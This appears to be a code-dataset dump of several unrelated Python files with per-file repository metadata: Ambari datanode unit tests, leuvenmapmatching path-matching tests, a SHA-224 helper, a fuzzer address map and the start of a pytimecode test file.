self.assertResourceCalled('Directory', '/hadoop/hdfs/data',
owner = 'hdfs',
ignore_failures = True,
group = 'hadoop',
mode = 0755,
recursive = True,
cd_access='a'
)
@patch('time.sleep')
@patch.object(shell, "call")
def test_post_rolling_restart(self, process_mock, time_mock):
process_output = """
Live datanodes (2):
Name: 192.168.64.102:50010 (c6401.ambari.apache.org)
Hostname: c6401.ambari.apache.org
Decommission Status : Normal
Configured Capacity: 524208947200 (488.21 GB)
DFS Used: 193069056 (184.13 MB)
Non DFS Used: 29264986112 (27.26 GB)
DFS Remaining: 494750892032 (460.77 GB)
DFS Used%: 0.04%
DFS Remaining%: 94.38%
Configured Cache Capacity: 0 (0 B)
Cache Used: 0 (0 B)
Cache Remaining: 0 (0 B)
Cache Used%: 100.00%
Cache Remaining%: 0.00%
Xceivers: 2
Last contact: Fri Dec 12 20:47:21 UTC 2014
"""
process_mock.return_value = (0, process_output)
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "post_rolling_restart",
config_file = "default.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.assertTrue(process_mock.called)
self.assertEqual(process_mock.call_count,1)
@patch('time.sleep')
@patch.object(shell, "call")
def test_post_rolling_restart_datanode_not_ready(self, process_mock, time_mock):
process_mock.return_value = (0, 'There are no DataNodes here!')
try:
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "post_rolling_restart",
config_file = "default.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.fail('Missing DataNode should have caused a failure')
except Fail,fail:
self.assertTrue(process_mock.called)
self.assertEqual(process_mock.call_count,12)
@patch('time.sleep')
@patch.object(shell, "call")
def test_post_rolling_restart_bad_returncode(self, process_mock, time_mock):
process_mock.return_value = (0, 'some')
try:
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "post_rolling_restart",
config_file = "default.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
self.fail('Invalid return code should cause a failure')
except Fail,fail:
self.assertTrue(process_mock.called)
self.assertEqual(process_mock.call_count,12)
@patch("resource_management.libraries.functions.security_commons.build_expectations")
@patch("resource_management.libraries.functions.security_commons.get_params_from_filesystem")
@patch("resource_management.libraries.functions.security_commons.validate_security_config_properties")
@patch("resource_management.libraries.functions.security_commons.cached_kinit_executor")
@patch("resource_management.libraries.script.Script.put_structured_out")
def test_security_status(self, put_structured_out_mock, cached_kinit_executor_mock, validate_security_config_mock, get_params_mock, build_exp_mock):
# Test that function works when is called with correct parameters
security_params = {
'core-site': {
'hadoop.security.authentication': 'kerberos'
},
'hdfs-site': {
'dfs.datanode.keytab.file': 'path/to/datanode/keytab/file',
'dfs.datanode.kerberos.principal': 'datanode_principal'
}
}
props_value_check = None
props_empty_check = ['dfs.datanode.keytab.file',
'dfs.datanode.kerberos.principal']
props_read_check = ['dfs.datanode.keytab.file']
result_issues = []
get_params_mock.return_value = security_params
validate_security_config_mock.return_value = result_issues
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "security_status",
config_file="secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
build_exp_mock.assert_called_with('hdfs-site', props_value_check, props_empty_check, props_read_check)
put_structured_out_mock.assert_called_with({"securityState": "SECURED_KERBEROS"})
cached_kinit_executor_mock.called_with('/usr/bin/kinit',
self.config_dict['configurations']['hadoop-env']['hdfs_user'],
security_params['hdfs-site']['dfs.datanode.keytab.file'],
security_params['hdfs-site']['dfs.datanode.kerberos.principal'],
self.config_dict['hostname'],
'/tmp')
# Testing when hadoop.security.authentication is simple
security_params['core-site']['hadoop.security.authentication'] = 'simple'
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "security_status",
config_file="secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
put_structured_out_mock.assert_called_with({"securityState": "UNSECURED"})
security_params['core-site']['hadoop.security.authentication'] = 'kerberos'
# Testing that the exception throw by cached_executor is caught
cached_kinit_executor_mock.reset_mock()
cached_kinit_executor_mock.side_effect = Exception("Invalid command")
try:
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "security_status",
config_file="secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
except:
self.assertTrue(True)
# Testing with a security_params which doesn't contains hdfs-site
empty_security_params = {}
empty_security_params['core-site'] = {}
empty_security_params['core-site']['hadoop.security.authentication'] = 'kerberos'
cached_kinit_executor_mock.reset_mock()
get_params_mock.reset_mock()
put_structured_out_mock.reset_mock()
get_params_mock.return_value = empty_security_params
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "security_status",
config_file="secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
put_structured_out_mock.assert_called_with({"securityIssuesFound": "Keytab file or principal are not set property."})
# Testing with not empty result_issues
result_issues_with_params = {}
result_issues_with_params['hdfs-site']="Something bad happened"
validate_security_config_mock.reset_mock()
get_params_mock.reset_mock()
validate_security_config_mock.return_value = result_issues_with_params
get_params_mock.return_value = security_params
self.executeScript(self.COMMON_SERVICES_PACKAGE_DIR + "/scripts/datanode.py",
classname = "DataNode",
command = "security_status",
config_file="secured.json",
hdp_stack_version = self.STACK_VERSION,
target = RMFTestCase.TARGET_COMMON_SERVICES
)
put_structured_out_mock.assert_called_with({"securityState": "UNSECURED"})
| 50.421304
| 228
| 0.546618
| 3,076
| 31,715
| 5.46619
| 0.112809
| 0.054716
| 0.037112
| 0.04187
| 0.856072
| 0.840371
| 0.8258
| 0.800642
| 0.777388
| 0.777388
| 0
| 0.015425
| 0.341794
| 31,715
| 628
| 229
| 50.501592
| 0.790036
| 0.009491
| 0
| 0.681159
| 0
| 0.036232
| 0.297504
| 0.121488
| 0
| 0
| 0
| 0
| 0.15942
| 0
| null | null | 0
| 0.009058
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
073ba2ef8cf2a8fcaad593e62fb105e2b40fe759
| 17,163
|
py
|
Python
|
tests/test_path.py
|
jks-liu/LeuvenMapMatching
|
e0a85e633c0351704b3e216d167625c7a1cc65a3
|
[
"Apache-2.0"
] | null | null | null |
tests/test_path.py
|
jks-liu/LeuvenMapMatching
|
e0a85e633c0351704b3e216d167625c7a1cc65a3
|
[
"Apache-2.0"
] | null | null | null |
tests/test_path.py
|
jks-liu/LeuvenMapMatching
|
e0a85e633c0351704b3e216d167625c7a1cc65a3
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# encoding: utf-8
"""
tests.test_path
~~~~~~~~~~~~~~~
:author: Wannes Meert
:copyright: Copyright 2017-2018 DTAI, KU Leuven and Sirris.
:license: Apache License, Version 2.0, see LICENSE for details.
"""
import sys
import os
import logging
from pathlib import Path
sys.path.append("..")
import leuvenmapmatching as mm
from leuvenmapmatching.map.inmem import InMemMap
from leuvenmapmatching.matcher.simple import SimpleMatcher
from leuvenmapmatching.matcher.distance import DistanceMatcher
logger = mm.logger
directory = None
def test_path1():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
# path_sol = ['A', ('A', 'B'), 'B', ('B', 'D'), 'D', ('D', 'E'), 'E', ('E', 'F')]
path_sol_nodes = ['A', 'B', 'D', 'E', 'F']
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C"]),
"B": ((1, 3), ["A", "C", "D"]),
"C": ((2, 2), ["A", "B", "D", "E"]),
"D": ((2, 4), ["B", "C", "D", "E"]),
"E": ((3, 3), ["C", "D", "F"]),
"F": ((3, 5), ["D", "E"])
}, use_latlon=False)
matcher = SimpleMatcher(mapdb, max_dist=None, min_prob_norm=None,
non_emitting_states=False, only_edges=False)
path_pred, _ = matcher.match(path, unique=True)
if directory:
matcher.print_lattice_stats()
matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
show_graph=True, show_lattice=True,
filename=str(directory / "test_path1.png"))
# assert path_pred == path_sol, f"Paths not equal:\n{path_pred}\n{path_sol}"
nodes_pred = matcher.path_pred_onlynodes
assert nodes_pred == path_sol_nodes, f"Nodes not equal:\n{nodes_pred}\n{path_sol_nodes}"
def test_path1_dist():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
# path_sol = ['A', ('A', 'B'), 'B', ('B', 'D'), 'D', ('D', 'E'), 'E', ('E', 'F')]
path_sol_nodes = ['A', 'B', 'D', 'E', 'F']
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C"]),
"B": ((1, 3), ["A", "C", "D"]),
"C": ((2, 2), ["A", "B", "D", "E"]),
"D": ((2, 4), ["B", "C", "D", "E"]),
"E": ((3, 3), ["C", "D", "F"]),
"F": ((3, 5), ["D", "E"])
}, use_latlon=False)
matcher = DistanceMatcher(mapdb, max_dist=None, min_prob_norm=None,
obs_noise=0.5,
non_emitting_states=False)
matcher.match(path)
if directory:
from leuvenmapmatching import visualization as mmviz
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True, show_graph=True,
filename=str(directory / "test_path1_dist.png"))
nodes_pred = matcher.path_pred_onlynodes
assert nodes_pred == path_sol_nodes, f"Nodes not equal:\n{nodes_pred}\n{path_sol_nodes}"
def test_path2():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
# path_sol = ['A', ('A', 'B'), 'B', ('B', 'D'), 'D', ('D', 'E'), 'E', ('E', 'F')]
path_sol_nodes = ['A', 'B', 'D', 'E', 'F']
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C", "X"]),
"B": ((1, 3), ["A", "C", "D", "K"]),
"C": ((2, 2), ["A", "B", "D", "E", "X", "Y"]),
"D": ((2, 4), ["B", "C", "F", "E", "K", "L"]),
"E": ((3, 3), ["C", "D", "F", "Y"]),
"F": ((3, 5), ["D", "E", "L"]),
"X": ((2, 0), ["A", "C", "Y"]),
"Y": ((3, 1), ["X", "C", "E"]),
"K": ((1, 5), ["B", "D", "L"]),
"L": ((2, 6), ["K", "D", "F"])
}, use_latlon=False)
matcher = SimpleMatcher(mapdb, max_dist=None, min_prob_norm=0.001,
non_emitting_states=False, only_edges=False,
max_lattice_width=3)
path_pred, _ = matcher.match(path, unique=True)
if directory:
matcher.print_lattice_stats()
matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
show_lattice=True, show_graph=True,
filename=str(directory / "test_path2.png"))
# assert path_pred == path_sol, "Nodes not equal:\n{}\n{}".format(path_pred, path_sol)
nodes_pred = matcher.path_pred_onlynodes
assert nodes_pred == path_sol_nodes, f"Nodes not equal:\n{nodes_pred}\n{path_sol_nodes}"
def test_path2_inc():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
# path_sol = ['A', ('A', 'B'), 'B', ('B', 'D'), 'D', ('D', 'E'), 'E', ('E', 'F')]
path_sol_nodes = ['A', 'B', 'D', 'E', 'F']
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C", "X"]),
"B": ((1, 3), ["A", "C", "D", "K"]),
"C": ((2, 2), ["A", "B", "D", "E", "X", "Y"]),
"D": ((2, 4), ["B", "C", "F", "E", "K", "L"]),
"E": ((3, 3), ["C", "D", "F", "Y"]),
"F": ((3, 5), ["D", "E", "L"]),
"X": ((2, 0), ["A", "C", "Y"]),
"Y": ((3, 1), ["X", "C", "E"]),
"K": ((1, 5), ["B", "D", "L"]),
"L": ((2, 6), ["K", "D", "F"])
}, use_latlon=False)
## Phase 1
print('=== PHASE 1 ===')
matcher = SimpleMatcher(mapdb, max_dist=None, min_prob_norm=0.001,
non_emitting_states=False, only_edges=False,
max_lattice_width=1)
path_pred, _ = matcher.match(path, unique=True)
if directory:
matcher.print_lattice_stats()
matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
with (directory / 'test_path2_inc_1.gv').open('w') as ofile:
matcher.lattice_dot(file=ofile, precision=2, render=True)
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
show_lattice=True, show_graph=True,
filename=str(directory / "test_path2_inc_1.png"))
## Next phases
for phase_nb, phase_width in enumerate([2, 3]):
print(f'=== PHASE {phase_nb + 2} ===')
path_pred, _ = matcher.increase_max_lattice_width(phase_width, unique=True)
if directory:
matcher.print_lattice_stats()
matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
with (directory / f'test_path2_inc_{phase_nb + 2}.gv').open('w') as ofile:
matcher.lattice_dot(file=ofile, precision=2, render=True)
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
show_lattice=True, show_graph=True,
filename=str(directory / f"test_path2_inc_{phase_nb + 2}.png"))
# assert path_pred == path_sol, "Nodes not equal:\n{}\n{}".format(path_pred, path_sol)
nodes_pred = matcher.path_pred_onlynodes
assert nodes_pred == path_sol_nodes, f"Nodes not equal:\n{nodes_pred}\n{path_sol_nodes}"
def test_path2_dist():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
path_sol_nodes = ['X', 'A', 'B', 'D', 'E', 'F']
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C", "X"]),
"B": ((1, 3), ["A", "C", "D", "K"]),
"C": ((2, 2), ["A", "B", "D", "E", "X", "Y"]),
"D": ((2, 4), ["B", "C", "F", "E", "K", "L"]),
"E": ((3, 3), ["C", "D", "F", "Y"]),
"F": ((3, 5), ["D", "E", "L"]),
"X": ((2, 0), ["A", "C", "Y"]),
"Y": ((3, 1), ["X", "C", "E"]),
"K": ((1, 5), ["B", "D", "L"]),
"L": ((2, 6), ["K", "D", "F"])
}, use_latlon=False)
matcher = DistanceMatcher(mapdb, max_dist=None, min_prob_norm=0.001,
obs_noise=0.5,
non_emitting_states=False)
matcher.match(path, unique=True)
if directory:
from leuvenmapmatching import visualization as mmviz
mmviz.plot_map(mapdb, matcher=matcher,
show_labels=True, show_matching=True, show_graph=True,
filename=str(directory / "test_path2_dist.png"))
nodes_pred = matcher.path_pred_onlynodes
assert nodes_pred == path_sol_nodes, f"Nodes not equal:\n{nodes_pred}\n{path_sol_nodes}"
def test_path_outlier():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
path_sol = ['A', 'B', 'D', 'C', 'D', 'E', 'F']
path.insert(13, (2.3, 1.8))
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C", "X"]),
"B": ((1, 3), ["A", "C", "D", "K"]),
"C": ((2, 2), ["A", "B", "D", "E", "X", "Y"]),
"D": ((2, 4), ["B", "C", "F", "E", "K", "L"]),
"E": ((3, 3), ["C", "D", "F", "Y"]),
"F": ((3, 5), ["D", "E", "L"]),
"X": ((2, 0), ["A", "C", "Y"]),
"Y": ((3, 1), ["X", "C", "E"]),
"K": ((1, 5), ["B", "D", "L"]),
"L": ((2, 6), ["K", "D", "F"])
}, use_latlon=False)
matcher = SimpleMatcher(mapdb, max_dist=None, min_prob_norm=0.0001,
max_dist_init=1, obs_noise=0.5, obs_noise_ne=10,
non_emitting_states=True)
_, last_idx = matcher.match(path, unique=True)
path_pred = matcher.path_pred_onlynodes
if directory:
matcher.print_lattice_stats()
matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
with (directory / 'lattice.gv').open('w') as ofile:
matcher.lattice_dot(file=ofile)
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
filename=str(directory / "test_path_outlier.png"))
print("Path through lattice:\n" + "\n".join(m.label for m in matcher.lattice_best))
assert last_idx == len(path) - 1
assert path_pred == path_sol, "Nodes not equal:\n{}\n{}".format(path_pred, path_sol)
def test_path_outlier2():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
path.insert(13, (2.3, -3.0))
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C", "X"]),
"B": ((1, 3), ["A", "C", "D", "K"]),
"C": ((2, 2), ["A", "B", "D", "E", "X", "Y"]),
"D": ((2, 4), ["B", "C", "F", "E", "K", "L"]),
"E": ((3, 3), ["C", "D", "F", "Y"]),
"F": ((3, 5), ["D", "E", "L"]),
"X": ((2, 0), ["A", "C", "Y"]),
"Y": ((3, 1), ["X", "C", "E"]),
"K": ((1, 5), ["B", "D", "L"]),
"L": ((2, 6), ["K", "D", "F"])
}, use_latlon=False)
matcher = DistanceMatcher(mapdb, max_dist=None, min_prob_norm=0.1,
max_dist_init=1, obs_noise=0.25, obs_noise_ne=1,
non_emitting_states=True)
_, last_idx = matcher.match(path, unique=True)
if directory:
# matcher.print_lattice_stats()
# matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
# with (directory / 'lattice.gv').open('w') as ofile:
# matcher.lattice_dot(file=ofile)
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
filename=str(directory / "test_path_outlier2.png"))
assert last_idx == 12
def test_path_outlier_dist():
path = [(0.8, 0.7), (0.9, 0.7), (1.1, 1.0), (1.2, 1.5), (1.2, 1.6), (1.1, 2.0),
(1.1, 2.3), (1.3, 2.9), (1.2, 3.1), (1.5, 3.2), (1.8, 3.5), (2.0, 3.7),
(2.1, 3.3), (2.4, 3.2), (2.6, 3.1), (2.9, 3.1), (3.0, 3.2), (3.1, 3.8),
(3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
path_sol = ['A', 'B', 'D', 'C', 'E', 'F']
path.insert(13, (2.3, 1.8))
mapdb = InMemMap("map", graph={
"A": ((1, 1), ["B", "C", "X"]),
"B": ((1, 3), ["A", "C", "D", "K"]),
"C": ((2, 2), ["A", "B", "D", "E", "X", "Y"]),
"D": ((2, 4), ["B", "C", "F", "E", "K", "L"]),
"E": ((3, 3), ["C", "D", "F", "Y"]),
"F": ((3, 5), ["D", "E", "L"]),
"X": ((2, 0), ["A", "C", "Y"]),
"Y": ((3, 1), ["X", "C", "E"]),
"K": ((1, 5), ["B", "D", "L"]),
"L": ((2, 6), ["K", "D", "F"])
}, use_latlon=False)
matcher = DistanceMatcher(mapdb, max_dist=None, min_prob_norm=0.0001,
max_dist_init=1, obs_noise=0.5, obs_noise_ne=10,
non_emitting_states=True)
matcher.match(path)
path_pred = matcher.path_pred_onlynodes
if directory:
from leuvenmapmatching import visualization as mmviz
mmviz.plot_map(mapdb, matcher=matcher,
show_labels=True, show_matching=True, show_graph=True,
filename=str(directory / "test_path_outlier_dist.png"))
# TODO: Smoothing the observation distances could eliminate the outlier
assert path_pred == path_sol, "Nodes not equal:\n{}\n{}".format(path_pred, path_sol)
def test_path3():
path = [(3.0, 3.2), (3.1, 3.8), (3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
path_sol = ['E', 'F']
mapdb = InMemMap("map", graph={
"E": ((3, 3), ["F"]),
"F": ((3, 5), ["E"]),
}, use_latlon=False)
matcher = SimpleMatcher(mapdb, max_dist=None, min_prob_norm=0.0001,
max_dist_init=1, obs_noise=0.25, obs_noise_ne=10,
non_emitting_states=True)
matcher.match(path, unique=True)
path_pred = matcher.path_pred_onlynodes
if directory:
matcher.print_lattice_stats()
matcher.print_lattice()
from leuvenmapmatching import visualization as mmviz
with (directory / 'lattice.gv').open('w') as ofile:
matcher.lattice_dot(file=ofile)
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
filename=str(directory / "test_path3.png"))
print("Path through lattice:\n" + "\n".join(m.label for m in matcher.lattice_best))
assert path_pred == path_sol, "Nodes not equal:\n{}\n{}".format(path_pred, path_sol)
def test_path3_dist():
path = [(3.0, 3.2), (3.1, 3.8), (3.0, 4.0), (3.1, 4.3), (3.1, 4.6), (3.0, 4.9)]
path_sol = ['E', 'F']
mapdb = InMemMap("map", graph={
"E": ((3, 3), ["F"]),
"F": ((3, 5), ["E"]),
}, use_latlon=False)
matcher = DistanceMatcher(mapdb, max_dist=None, min_prob_norm=0.0001,
max_dist_init=1, obs_noise=0.25, obs_noise_ne=10,
non_emitting_states=True)
matcher.match(path, unique=True)
path_pred = matcher.path_pred_onlynodes
if directory:
from leuvenmapmatching import visualization as mmviz
mmviz.plot_map(mapdb, matcher=matcher, show_labels=True, show_matching=True,
filename=str(directory / "test_path3_dist.png"))
print("Path through lattice:\n" + "\n".join(m.label for m in matcher.lattice_best))
assert path_pred == path_sol, "Nodes not equal:\n{}\n{}".format(path_pred, path_sol)
if __name__ == "__main__":
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler(sys.stdout))
directory = Path(os.environ.get('TESTDIR', Path(__file__).parent))
print(f"Saving files to {directory}")
test_path1()
# test_path1_dist()
# test_path2()
# test_path2_inc()
# test_path2_dist()
# test_path_outlier()
# test_path_outlier2()
# test_path_outlier_dist()
# test_path3()
# test_path3_dist()
| 45.646277
| 101
| 0.48657
| 2,731
| 17,163
| 2.922373
| 0.062981
| 0.017542
| 0.010525
| 0.009021
| 0.867435
| 0.863426
| 0.855657
| 0.847638
| 0.841373
| 0.840371
| 0
| 0.082652
| 0.265455
| 17,163
| 375
| 102
| 45.768
| 0.550409
| 0.068519
| 0
| 0.803279
| 0
| 0
| 0.07591
| 0.019244
| 0
| 0
| 0
| 0.002667
| 0.036066
| 1
| 0.032787
| false
| 0
| 0.062295
| 0
| 0.095082
| 0.059016
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4af8af8d74f1c76e909285d780419f5abf36f548
| 440
|
py
|
Python
|
hash/hash_sha224.py
|
gorgeousbubble/Nightmare
|
b374b48877898b6193081b7a8a6d2fb571816c75
|
[
"Apache-2.0"
] | 1
|
2019-10-24T15:47:18.000Z
|
2019-10-24T15:47:18.000Z
|
hash/hash_sha224.py
|
gorgeousbubble/Nightmare
|
b374b48877898b6193081b7a8a6d2fb571816c75
|
[
"Apache-2.0"
] | null | null | null |
hash/hash_sha224.py
|
gorgeousbubble/Nightmare
|
b374b48877898b6193081b7a8a6d2fb571816c75
|
[
"Apache-2.0"
] | 3
|
2019-10-24T15:47:25.000Z
|
2020-11-01T01:26:41.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import hashlib
def hash_sha224(s):
sha224 = hashlib.sha224()
sha224.update(s.encode('utf-8'))
return sha224.hexdigest()
def hash_sha224_encode(s):
sha224 = hashlib.sha224()
sha224.update(s.encode('utf-8'))
return sha224.hexdigest()
def hash_sha224_check(s, r):
sha224 = hashlib.sha224()
sha224.update(s.encode('utf-8'))
return sha224.hexdigest() == r
| 20
| 36
| 0.654545
| 61
| 440
| 4.639344
| 0.311475
| 0.056537
| 0.137809
| 0.265018
| 0.766784
| 0.766784
| 0.766784
| 0.766784
| 0.766784
| 0.766784
| 0
| 0.138122
| 0.177273
| 440
| 21
| 37
| 20.952381
| 0.643646
| 0.097727
| 0
| 0.615385
| 0
| 0
| 0.037975
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.230769
| false
| 0
| 0.076923
| 0
| 0.538462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
ab4a350db96dbb433da3f3edec2ff218f8d1d619
| 279
|
py
|
Python
|
ilf/fuzzers/imitation/addr_map.py
|
ConstantinHvber/ilf
|
b706f81191508998d443c1c89e8d10028ce4e5d8
|
[
"Apache-2.0"
] | 84
|
2019-11-29T08:32:41.000Z
|
2022-03-30T01:43:23.000Z
|
ilf/fuzzers/imitation/addr_map.py
|
edolele/ilf
|
ddd15f201d451d62b94fb45fee7266fb579ab787
|
[
"Apache-2.0"
] | 14
|
2019-12-30T15:54:00.000Z
|
2022-03-14T09:37:15.000Z
|
ilf/fuzzers/imitation/addr_map.py
|
edolele/ilf
|
ddd15f201d451d62b94fb45fee7266fb579ab787
|
[
"Apache-2.0"
] | 20
|
2020-01-04T05:54:33.000Z
|
2022-03-29T14:11:43.000Z
|
ADDR_MAP = {
"0x2fe5e54e71755a9719fd5b06c8697cefa1283165": 0,
"0x9b4ffb882b897fd506116cfb02362af19c96512d": 1,
"0x86c5593ac99644f476986488abaaba94dd00a584": 2,
"0x0c1d67ee5b4654fe0341e5897ec11d62bc29cf5c": 3,
"0xf392acadbf35d37f68a3ee991beb593188036763": 4,
}
| 39.857143
| 52
| 0.799283
| 12
| 279
| 18.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.565041
| 0.11828
| 279
| 7
| 53
| 39.857143
| 0.337398
| 0
| 0
| 0
| 0
| 0
| 0.75
| 0.75
| 0
| 0
| 0.75
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ab566ba9992c4123f837c3498435a1adc2737ccf
| 22,194
|
py
|
Python
|
tests/test_pytimecode.py
|
bantonj/PyTimeCode
|
aac1a3eebcb689d49c0f21fa9138f7d5d719303a
|
[
"MIT"
] | 13
|
2015-03-13T16:04:43.000Z
|
2022-03-23T02:48:54.000Z
|
tests/test_pytimecode.py
|
bantonj/PyTimeCode
|
aac1a3eebcb689d49c0f21fa9138f7d5d719303a
|
[
"MIT"
] | 1
|
2016-06-03T00:31:11.000Z
|
2018-05-01T15:43:14.000Z
|
tests/test_pytimecode.py
|
bantonj/PyTimeCode
|
aac1a3eebcb689d49c0f21fa9138f7d5d719303a
|
[
"MIT"
] | 7
|
2015-07-06T03:09:03.000Z
|
2021-05-29T17:57:29.000Z
|
"""Testing for pytimecode"""
import pytimecode
class TestPyTimeCode:
